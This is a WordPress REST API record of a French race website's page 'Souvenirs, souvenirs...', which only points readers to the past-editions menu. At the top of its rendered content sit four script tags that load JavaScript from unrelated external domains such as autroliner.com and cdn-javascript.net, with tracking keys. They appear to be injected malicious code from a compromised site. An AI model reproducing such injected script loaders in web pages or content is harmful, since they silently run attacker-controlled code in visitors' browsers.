{"id":2557,"date":"2020-01-13T13:47:36","date_gmt":"2020-01-13T12:47:36","guid":{"rendered":"http:\/\/enfiletesbaskets.fr\/?page_id=2557"},"modified":"2025-10-07T21:13:31","modified_gmt":"2025-10-07T19:13:31","slug":"les-courses-en-photos","status":"publish","type":"page","link":"https:\/\/enfiletesbaskets.fr\/?page_id=2557","title":{"rendered":"Souvenirs, souvenirs&#8230;"},"content":{"rendered":"<p><script src=\"\/\/autroliner.com\/225cd6e1ef3a4470f9.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8796x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8796x&amp;format=arrjs&amp;r=1578919643278\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/autroliner.com\/ext\/225cd6e1ef3a4470f9.js?sid=52646_8796_&amp;title=aaa&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n\n\n<p><strong>D\u00e9tail ann\u00e9e par ann\u00e9e dans le menu \u00e9ditions pass\u00e9es<\/strong><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>D\u00e9tail ann\u00e9e par ann\u00e9e dans le menu \u00e9ditions pass\u00e9es<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/enfiletesbaskets.fr\/index.php?rest_route=\/wp\/v2\/pages\/2557"}],"collection":[{"href":"https:\/\/enfiletesbaskets.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/enfiletesbaskets.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/enfiletesbaskets.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enfiletesbaskets.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2557"}],"version-history":[{"count":12,"href":"https:\/\/enfiletesbaskets.fr\/index.php?rest_route=\/wp\/v2\/pages\/2557\/revisions"}],"predecessor-version":[{"id":5150,"href":"https:\/\/enfiletesbaskets.fr\/index.php?rest_route=\/wp\/v2\/pages\/2557\/revisions\/5150"}],"wp:attachment":[{"href":"https:\/\/enfiletesbaskets.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2557"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}